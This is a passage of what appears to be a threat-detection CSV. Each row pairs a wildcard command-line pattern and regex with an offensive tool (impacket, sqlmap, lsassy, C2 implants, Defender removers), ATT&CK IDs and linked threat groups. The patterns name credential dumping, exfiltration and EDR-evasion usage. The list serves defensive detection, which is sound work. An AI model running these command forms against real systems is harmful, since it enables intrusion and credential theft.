"* -d * -t zonewalk > *",".{0,1000}\s\-d\s.{0,1000}\s\-t\szonewalk\s\>\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","767"
"* -d * -t zonewalk*",".{0,1000}\s\-d\s.{0,1000}\s\-t\szonewalk.{0,1000}","offensive_tool_keyword","dnsrecon","DNSRecon is a Python port of a Ruby script that I wrote to learn the language and about DNS in early 2007. This time I wanted to learn about Python and extend the functionality of the original tool and in the process re-learn how DNS works and how could it be used in the process of a security assessment and network troubleshooting.","T1590 - T1590.001","TA0001 - TA0007","N/A","N/A","Reconnaissance","https://github.com/darkoperator/dnsrecon","1","0","#linux","N/A","6","10","2755","556","2025-04-18T05:31:08Z","2010-12-16T03:25:49Z","768"
"* -d * -u * -p * --listener * --target *$DC_HOST*",".{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-listener\s.{0,1000}\s\-\-target\s.{0,1000}\$DC_HOST.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","769"
"* -d * -u *\* -p * --da*",".{0,1000}\s\-d\s.{0,1000}\s\-u\s.{0,1000}\\.{0,1000}\s\-p\s.{0,1000}\s\-\-da.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","0","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","770"
"* -d *Active Protection DLL for SylantStrike*",".{0,1000}\s\-d\s.{0,1000}Active\sProtection\sDLL\sfor\sSylantStrike.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","771"
"* -d:sleepmask*",".{0,1000}\s\-d\:sleepmask.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","772"
"* daap-get-library.nse*",".{0,1000}\sdaap\-get\-library\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","773"
"* dacledit.py*",".{0,1000}\sdacledit\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","774"
"* -daisyserver *",".{0,1000}\s\-daisyserver\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","775"
"* danielbohannon/Invoke-CradleCrafter*",".{0,1000}\sdanielbohannon\/Invoke\-CradleCrafter.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","777"
"* darkcodersc *",".{0,1000}\sdarkcodersc\s.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","0","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","778"
"* darkexe.py*",".{0,1000}\sdarkexe\.py.{0,1000}","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","N/A","10","8","758","152","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z","779"
"* --DataDirectory * --CookieAuthentication * --DisableNetwork * --hush --SocksPort * -f * --ControlPort * --ControlPortWriteToFile *",".{0,1000}\s\-\-DataDirectory\s.{0,1000}\s\-\-CookieAuthentication\s.{0,1000}\s\-\-DisableNetwork\s.{0,1000}\s\-\-hush\s\-\-SocksPort\s.{0,1000}\s\-f\s.{0,1000}\s\-\-ControlPort\s.{0,1000}\s\-\-ControlPortWriteToFile\s.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","780"
"* daytime.nse*",".{0,1000}\sdaytime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","783"
"* db2-das-info.nse*",".{0,1000}\sdb2\-das\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","784"
"* --dbms=mysql -u *",".{0,1000}\s\-\-dbms\=mysql\s\-u\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0005 - TA0007 - TA0042","N/A","Black Basta - Ajax Security Team - APT41 - ENERGETIC BEAR - APT35","Exploitation tool","https://github.com/sqlmapproject/sqlmap","1","0","#linux","N/A","N/A","10","33939","5862","2025-04-05T12:41:50Z","2012-06-26T09:52:15Z","785"
"* --dc * -m custom --filter *objectCategory*",".{0,1000}\s\-\-dc\s.{0,1000}\s\-m\scustom\s\-\-filter\s.{0,1000}objectCategory.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","786"
"* -dc-host * -spn * -impersonate *",".{0,1000}\s\-dc\-host\s.{0,1000}\s\-spn\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","Pachine","Python implementation for CVE-2021-42278 (Active Directory Privilege Escalation)","T1068 - T1078 - T1059.006","TA0003 - TA0004 - TA0002","N/A","Black Basta","Privilege Escalation","https://github.com/ly4k/Pachine","1","0","N/A","N/A","8","3","275","37","2022-01-13T12:35:19Z","2021-12-13T23:15:05Z","787"
"* -dc-ip * -computer-pass *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-computer\-pass\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","788"
"* -dc-ip * -dump *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-dump\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","789"
"* -dc-ip * -impersonate *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","790"
"* --dc-ip * -request * -format hashcat*",".{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-request\s.{0,1000}\s\-format\shashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","Black Basta","Credential Access","https://github.com/hashcat/hashcat","1","0","#linux","N/A","10","10","22481","3046","2024-08-16T23:50:35Z","2015-12-04T14:46:51Z","791"
"* -dc-ip * -so *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\s\-so\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","792"
"* -dc-ip * -target-ip *",".{0,1000}\s\-dc\-ip\s.{0,1000}\s\-target\-ip\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","793"
"* --dc-ip * --vuln --enabled*",".{0,1000}\s\-\-dc\-ip\s.{0,1000}\s\-\-vuln\s\-\-enabled.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","794"
"* -dc-ip *SAMDump*",".{0,1000}\s\-dc\-ip\s.{0,1000}SAMDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","795"
"* dcow.c *",".{0,1000}\sdcow\.c\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","N/A","10","972","393","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z","797"
"* dcow.cpp*",".{0,1000}\sdcow\.cpp.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/gbonacini/CVE-2016-5195","1","0","N/A","N/A","N/A","4","326","121","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z","798"
"* ddexec.sh *",".{0,1000}\sddexec\.sh\s.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","799"
"* -DDONUT_EXE *",".{0,1000}\s\-DDONUT_EXE\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","800"
"* ddsc.sh -x*",".{0,1000}\sddsc\.sh\s\-x.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","801"
"* ddspoof.py*",".{0,1000}\sddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","802"
"* deadPool.ps1*",".{0,1000}\sdeadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","0","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","803"
"* --deauth * -a TR:GT:AP:BS:SS:ID wlan*",".{0,1000}\s\-\-deauth\s.{0,1000}\s\-a\sTR\:GT\:AP\:BS\:SS\:ID\swlan.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","804"
"* --debug --exfil --onedrive*",".{0,1000}\s\-\-debug\s\-\-exfil\s\-\-onedrive.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","805"
"* decrypt *.aes.zip*",".{0,1000}\sdecrypt\s.{0,1000}\.aes\.zip.{0,1000}","offensive_tool_keyword","EncryptedZIP","Compresses a directory or file and then encrypts the ZIP file with a supplied key using AES256 CFB. This assembly also clears the key out of memory using RtlZeroMemory","T1564.001 - T1027 - T1214.001","TA0005 - TA0010","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/EncryptedZIP","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","806"
"* Decrypt-RDCMan.ps1*",".{0,1000}\sDecrypt\-RDCMan\.ps1.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","807"
"* deepce.sh *--install*",".{0,1000}\sdeepce\.sh\s.{0,1000}\-\-install.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","808"
"* default_logins.txt*",".{0,1000}\sdefault_logins\.txt.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","10326","2137","2025-04-04T12:19:05Z","2014-04-24T14:45:37Z","809"
"*--- Defender Remover Script*",".{0,1000}\-\-\-\sDefender\sRemover\sScript.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#content","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","810"
"* defender-exclusions.ps1*",".{0,1000}\sdefender\-exclusions\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","811"
"* Defense_Evasion.sh*",".{0,1000}\sDefense_Evasion\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","812"
"* DEL {}SQLDmpr*.mdmp & for /f *",".{0,1000}\sDEL\s\{\}SQLDmpr.{0,1000}\.mdmp\s\&\sfor\s\/f\s.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","813"
"* DelegationBOF.c *",".{0,1000}\sDelegationBOF\.c\s.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","815"
"* delegationx64.o*",".{0,1000}\sdelegationx64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","816"
"* delegationx86.o*",".{0,1000}\sdelegationx86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - 